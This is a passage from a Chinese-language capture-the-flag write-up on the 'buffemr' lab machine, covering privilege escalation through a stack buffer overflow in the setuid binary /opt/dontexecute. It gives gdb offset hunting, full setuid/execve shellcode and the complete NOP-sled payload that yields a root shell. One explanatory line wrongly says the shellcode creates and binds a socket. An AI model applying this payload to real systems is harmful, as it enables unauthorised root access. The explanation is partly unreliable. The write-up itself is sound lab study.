1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Starting program: /opt/dontexecute Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B
Program received signal SIGSEGV, Segmentation fault.
0x31724130 in ?? ()
可以看到程序崩溃了,提示0x31724130
计算一下偏移量
┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# ./pattern_offset.rb -q 0x31724130
[*] Exact match at offset 512
可以看到偏移量为512
到这里可能还是单纯的利用工具做出来的,我们进一步去分析怎么操作
$(python -c "print 'A'*100")
Starting program: /opt/dontexecute $(python -c "print 'A'*100")
[Inferior 1 (process 3940) exited normally]
A 的十六进制是 \x41,在 520 处它会覆盖 EIP,而在 510 处它不会覆盖 EIP,因此我们需要找到在 520 和 510
(gdb) run $(python -c "print 'A'*510")
Starting program: /opt/dontexecute $(python -c "print 'A'*510")
Program received signal SIGSEGV, Segmentation fault.
0x5655572c in main ()
(gdb) run $(python -c "print 'A'*511")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*511")
Program received signal SIGSEGV, Segmentation fault.
0x5655572c in main ()
(gdb) run $(python -c "print 'A'*512")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*512")
Program received signal SIGSEGV, Segmentation fault.
0xffffd776 in ?? ()
(gdb) run $(python -c "print 'A'*513")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*513")
Program received signal SIGSEGV, Segmentation fault.
0x56550041 in ?? ()
(gdb) run $(python -c "print 'A'*514")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*514")
Program received signal SIGSEGV, Segmentation fault.
0x56004141 in ?? ()
(gdb) run $(python -c "print 'A'*515")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*515")
Program received signal SIGSEGV, Segmentation fault.
0x00414141 in ?? ()
(gdb) run $(python -c "print 'A'*516")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print 'A'*516")
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
经过几次尝试,到516这里就都是AAAA了
我们需要 516 个 A 来覆盖 EIP,并且 4 个字节是返回地址,因此缓冲区大小将为 516-4 = 512
这里找一个shellcode:shell-code-priv-esc
\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh
\x31\xc0- XOR寄存器EAX和自身,将EAX寄存器的值设置为0。
\x31\xdb- XOR寄存器EBX和自身,将EBX寄存器的值设置为0。
\xb0\x17- 将立即数0x17(十进制的23)移动到AL寄存器(即EAX的低8位)。
\xcd\x80- INT 0x80,这是一个软件中断,用于进行系统调用。
\xeb\x1f- JMP 0x1f,跳转到当前指令地址后的0x1f(31)字节。
\x5e\x89\x76\x08- 一系列指令用于准备和调用/bin/sh。
\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff- 这部分是用于创建socket,绑定,监听,以及执行/bin/sh的代码。
计算一下字节数
┌──(root㉿MYsec)-[/usr/share/metasploit-framework/tools/exploit]
└─# python2 -c "print len('\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh')"
53
现在计划是使用 NOP 或无操作后跟 shell 代码,以获得 shell.
需要计算使用多少NOP
512-53=459
NOP 是十六进制的
\x90
所以可以这样构造payload
python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'"
gdb运行一下看看
(gdb) run $(python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print '\x90' * 459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\x41\x41\x41\x41'")
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)
用x/300wx $esp看一下内存,可以看到0x90是我们的 NOP,因此我们可以使用 NOP 的任何返回地址来让 shell 在之后执行
运行下面的payload
run $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
成功运行后,发现并么有提权成功
(gdb) run $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /opt/dontexecute $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
process 3982 is executing new program: /bin/dash
$ id
uid=1000(buffemr) gid=1000(buffemr) groups=1000(buffemr),4(adm),24(cdrom),30(dip),46(plugdev),116(lpadmin),126(sambashare)
$ whoami
buffemr
$
退出gdb后利用dontexecute执行
mr@buffemr:/opt$ ./dontexecute $(python -c "print '\x90'*459 + '\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh' + '\xc0\xd6\xff\xff'")
# whoami
root
成功提权
三、总结
该靶机前期需要对down下来的源码进行简单分析,提取泄露的敏感信息如账户密码等,成功登录后台后,可以看到cms的版本号,可以通过kali自带的漏洞库查找是否相关的漏洞,提权这块值得学习的是缓冲区溢出,这个后续可以多学习学习。
searchsploit的使用- 缓冲区溢出提权
strcpy溢出原理学习
